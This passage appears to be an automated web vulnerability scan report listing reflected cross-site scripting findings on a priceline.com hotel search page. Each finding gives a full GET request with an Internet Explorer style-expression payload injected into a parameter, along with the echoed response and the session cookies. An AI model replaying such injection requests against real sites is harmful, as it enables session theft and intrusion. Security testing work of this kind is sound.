Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a4663010a20111003004152fbd011596863; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A41%3A52&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:41:52 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8703
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="plf" value="pclh99caf"style="x:expression(alert(1))"833635bc1c4"/>
...[SNIP]...

4.135. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64d85"style%3d"x%3aexpression(alert(1))"a198d7f06731f0eda was submitted in the plf parameter. This input was echoed as 64d85"style="x:expression(alert(1))"a198d7f06731f0eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln64d85"style%3d"x%3aexpression(alert(1))"a198d7f06731f0eda&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:29 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a201110030012298d9011569040; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A29&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:29 GMT; Path=/
Set-Cookie: JSESSIONID=6EEC0222C16184AE104462D4B0709E7B; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="plf" value="pcln64d85"style="x:expression(alert(1))"a198d7f06731f0eda"/>
...[SNIP]...

4.136. http://travela.priceline.com/hotel/searchHotels.do [refclickid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the refclickid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2b1f"style%3d"x%3aexpression(alert(1))"cba8bf32e4d was submitted in the refclickid parameter. This input was echoed as a2b1f"style="x:expression(alert(1))"cba8bf32e4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCHa2b1f"style%3d"x%3aexpression(alert(1))"cba8bf32e4d&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:14 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a4663010a20111003004214fcb011591999; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCHa2b1f%22style%3D%22x%3Aexpression%28alert%281%29%29%22cba8bf32e4d&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A14&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:14 GMT; Path=/
Set-Cookie: JSESSIONID=478ECA18FDCB0CBE1B6CF2F5DD8CAE2E; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8692
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="refclickid" value="TRIP_HOTELSEARCHa2b1f"style="x:expression(alert(1))"cba8bf32e4d"/>
...[SNIP]...

4.137. http://travela.priceline.com/hotel/searchHotels.do [refid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1a46"style%3d"x%3aexpression(alert(1))"ca3302ebf48 was submitted in the refid parameter. This input was echoed as f1a46"style="x:expression(alert(1))"ca3302ebf48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORKf1a46"style%3d"x%3aexpression(alert(1))"ca3302ebf48&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:02 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5064010a20111003004202fc4011595135; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A02&ID=AWAYNETWORKf1a46%22style%3D%22x%3Aexpression%28alert%281%29%29%22ca3302ebf48&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:02 GMT; Path=/
Set-Cookie: JSESSIONID=83C2A1DBF448DE9177F5CE64AE431F48; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8673
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="refid" value="PLAWAYNETWORKf1a46"style="x:expression(alert(1))"ca3302ebf48"/>
...[SNIP]...

4.138. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the searchHotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c224"style%3d"x%3aexpression(alert(1))"ac9aefefd97 was submitted in the searchHotelName parameter. This input was echoed as 3c224"style="x:expression(alert(1))"ac9aefefd97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=3c224"style%3d"x%3aexpression(alert(1))"ac9aefefd97&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:24 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003004324892011586846; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A24&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:24 GMT; Path=/
Set-Cookie: JSESSIONID=98CB30E792005DF2ECE69F8BDE3B019C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8701
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="searchHotelName" value="3c224"style="x:expression(alert(1))"ac9aefefd97"/>
...[SNIP]...

4.139. http://travela.priceline.com/hotel/searchHotels.do [searchHotelName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the searchHotelName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 180f2"style%3d"x%3aexpression(alert(1))"e75efbd596f11fed2 was submitted in the searchHotelName parameter. This input was echoed as 180f2"style="x:expression(alert(1))"e75efbd596f11fed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=180f2"style%3d"x%3aexpression(alert(1))"e75efbd596f11fed2&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:18:52 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003001852c4b011716787; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A18%3A52&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:18:52 GMT; Path=/
Set-Cookie: JSESSIONID=E910CBEB7C4B0BA6F229F909870A077C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8955
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="searchHotelName" value="180f2"style="x:expression(alert(1))"e75efbd596f11fed2"/>
...[SNIP]...

4.140. http://travela.priceline.com/hotel/searchHotels.do [searchType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the searchType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afb1a"style%3d"x%3aexpression(alert(1))"eb0c43cef34 was submitted in the searchType parameter. This input was echoed as afb1a"style="x:expression(alert(1))"eb0c43cef34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITYafb1a"style%3d"x%3aexpression(alert(1))"eb0c43cef34&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:27 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a2011100300422785f011588222; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A27&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:27 GMT; Path=/
Set-Cookie: JSESSIONID=5AF6412533AE00D3D1CEEF9F638769E6; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8692
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="searchType" value="CITYafb1a"style="x:expression(alert(1))"eb0c43cef34"/>
...[SNIP]...

4.141. http://travela.priceline.com/hotel/searchHotels.do [session_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the session_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5152c"style%3d"x%3aexpression(alert(1))"1c7c7696765 was submitted in the session_key parameter. This input was echoed as 5152c"style="x:expression(alert(1))"1c7c7696765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb12708075152c"style%3d"x%3aexpression(alert(1))"1c7c7696765&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:43 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a20111003004143fb1011593135; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A41%3A43&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:41:43 GMT; Path=/
Set-Cookie: JSESSIONID=2FC916A2D6AEAFE7CD85D65B780218F1; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8701
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="session_key" value="711510AC721510AC2011100300374475eeb12708075152c"style="x:expression(alert(1))"1c7c7696765"/>
...[SNIP]...

